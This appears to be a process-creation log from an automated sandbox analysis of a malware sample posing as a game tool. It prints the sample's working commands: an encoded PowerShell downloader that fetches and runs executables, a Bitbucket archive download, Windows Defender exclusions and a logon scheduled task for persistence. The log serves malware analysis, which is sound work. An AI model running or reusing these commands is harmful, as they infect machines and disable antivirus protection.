                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 1251
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe ""C:\Users\user\AppData\Roaming\runHidden.vbs""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "dota2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im dota2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "cs2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im cs2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "RustClient.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im RustClient.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "GTA5.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im GTA5.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>; Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 1251
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "dota2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im dota2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "cs2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im cs2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "RustClient.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im RustClient.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "GTA5.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im GTA5.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "RustClient.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "GTA5.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
